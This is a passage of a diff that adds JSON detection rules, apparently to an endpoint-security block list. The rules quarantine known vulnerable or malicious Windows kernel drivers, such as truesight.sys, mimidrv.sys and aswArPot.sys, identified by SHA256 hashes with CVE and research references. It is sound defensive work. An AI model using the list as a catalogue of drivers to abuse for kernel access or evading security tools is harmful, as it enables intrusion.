+ "value": "3e1d47a497babbfd1c83905777b517ec87c65742bee7eb57a2273eca825d2272",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "253b43ba-71c2-592d-8090-e29b589b0080",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817942Z",
+ "creation_date": "2026-03-23T11:45:31.817946Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817963Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2ed8c91ed5e634739ff0d5f61b058f5a043b3c50c8cd23ec9a76d1e6d562062a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2543e7d8-7d97-559c-8a88-8ec2eb942d0e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618948Z",
+ "creation_date": "2026-03-23T11:45:29.618950Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618956Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4ae065383a4ef5564a515d12adf18427f8d74cc15140edb95e5e2a51ca44fe42",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "25500730-e86b-5557-a2c0-d5694c8450b9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825698Z",
+ "creation_date": "2026-03-23T11:45:31.825700Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825706Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "48b7d25417eef1ec854ef7fc7ce5a6009f5b85dfe0f849e8ef56251dc899f99c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2559c47b-d7bb-53fc-8128-6c54d58a1e46",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148041Z",
+ "creation_date": "2026-03-23T11:45:31.148043Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148049Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cd571311e5c8a420a53bdf0adb2b8a6542553c9d7c1434595875ad219bd3adad",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "255f6f88-fc97-5a91-822c-4d7ac63feaf4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828441Z",
+ "creation_date": "2026-03-23T11:45:31.828443Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828448Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "98d90c58d6e7da9440f9bebfb6f2a6d7285a31f84acbae00c6d108b29a067b3a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2569b812-f931-5ce8-a3f9-68660c758131",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817206Z",
+ "creation_date": "2026-03-23T11:45:31.817209Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817218Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2e83731992993c9bd1ce619bf3afcafee07a2e35ad797a4300748b174a811a10",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "256aa586-78c1-551c-82b1-aee3653ba4a3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.161075Z",
+ "creation_date": "2026-03-23T11:45:31.161077Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.161082Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1dc0310211470fd0f20ef69db63b332e493edf11fa192d02bec6ff2a9a380424",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "256b7a81-ba5b-518b-8e09-48a6b3c5f286",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.465540Z",
+ "creation_date": "2026-03-23T11:45:30.465543Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.465552Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "008fa89822b7a1f91e5843169083202ea580f7b06eb6d5cae091ba844d035f25",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "25707eb2-d59f-591b-b46b-6bdc769dff93",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817842Z",
+ "creation_date": "2026-03-23T11:45:31.817844Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817853Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9450482ae96ad3b7b0fcf50f43c6a80be632643942aa044e58268eb5422b4219",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2570c2bf-f724-5f90-a9fc-8fe94ab74575",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.491344Z",
+ "creation_date": "2026-03-23T11:45:31.491347Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.491355Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9e09866276f58c2807315c78bd035622a182ea95ebb80714af69ca884b6a1f06",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2577cf42-46f3-596d-8c00-33c7284e65e0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.500010Z",
+ "creation_date": "2026-03-23T11:45:31.500014Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.500023Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f658233bb32c1e6b23b0e70dd84294a5cbc5d44e3907e355e1da7683660a4672",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "25839a57-1801-529b-9242-809a6a46716e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.464598Z",
+ "creation_date": "2026-03-23T11:45:30.464601Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.464610Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4136f1eb11cc463a858393ea733d5f1c220a3187537626f7f5d63eccf7c5a03f",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2590ea5c-2a39-5aa1-b1f2-14357e60afea",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969364Z",
+ "creation_date": "2026-03-23T11:45:29.969366Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969372Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c0c131bc8d6c8b5a2be32474474b1221bce1289c174c87e743ed4a512f5571d4",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2591776a-0d11-5790-8358-9c49cdafd039",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.475828Z",
+ "creation_date": "2026-03-23T11:45:31.475832Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.475842Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a0dfe6cc077baf31617f91334d12589801a98aaae7b712f7976df63e86e203e7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "259eab04-77cf-5108-a3e4-0365cc226ccc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822273Z",
+ "creation_date": "2026-03-23T11:45:31.822275Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822281Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "20a18c56859638b8ea44319510a109cf02faa32295c5a9f4a0020de2b67d16b2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "25a0b46e-df5f-5fb3-a4ba-e2b172aba933",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.480429Z",
+ "creation_date": "2026-03-23T11:45:31.480433Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.480442Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b285a125b15f81d584919330b277d70d22d3d01f187bb2c10029f0927ea67066",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "25a8189c-c3ca-5861-9603-0b261b889aa8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.821521Z",
+ "creation_date": "2026-03-23T11:45:31.821523Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.821528Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d8edce22f1222f23d7884cd8b4ce2c01172317a356f270abf95907839491d97e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "25ad89a2-dc41-59cf-a148-7aae7f4305f5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.475416Z",
+ "creation_date": "2026-03-23T11:45:30.475419Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.475428Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9e428c1d1cd7358e2c2f25ede45e718b22cb5d04634a4d1ec08a87e71248685b",
+ "comment": "Vulnerable Kernel Driver (aka mhyprotnap.sys) [https://www.loldrivers.io/drivers/75a66604-f024-4f11-8ba7-fdd64a0df3bf/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "25b30dbe-b022-5a27-8841-4b5d11cd2b48",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155753Z",
+ "creation_date": "2026-03-23T11:45:31.155755Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155760Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7cff7d3f12c0e6782d4875cf3efc18ad7c31676d16641de6d8d0275ba76058d4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "25b360ec-59f0-531b-ae3a-dd5c3061f565",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983010Z",
+ "creation_date": "2026-03-23T11:45:29.983014Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983021Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c10c70be4e36fa9c98a4796c2b03db86398e2b07018550b7f0d58edabc553ad2",
+ "comment": "Vulnerable Kernel Driver (aka WiseUnlo.sys) [https://www.loldrivers.io/drivers/b28cc2ee-d4a2-4fe4-9acb-a7a61cad20c6/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "25b3fe2c-4f62-5269-88b2-2c57290a8a05",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.455989Z",
+ "creation_date": "2026-03-23T11:45:30.455993Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.456002Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "de09000bb9f5f81ff6c9ba239ea2498cff4e3decf6ae0220e4b0d64c3500acf8",
+ "comment": "Vulnerable Kernel Driver (aka HWiNFO32.SYS) [https://www.loldrivers.io/drivers/2225128d-a23f-434a-aaee-69a88ea64fbd/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "25bab5ca-8907-54b3-a8f4-709658efcd5e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480244Z",
+ "creation_date": "2026-03-23T11:45:30.480246Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480252Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cac5dc7c3da69b682097144f12a816530091d4708ca432a7ce39f6abe6616461",
+ "comment": "Vulnerable Kernel Driver (aka GEDevDrvSYS.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
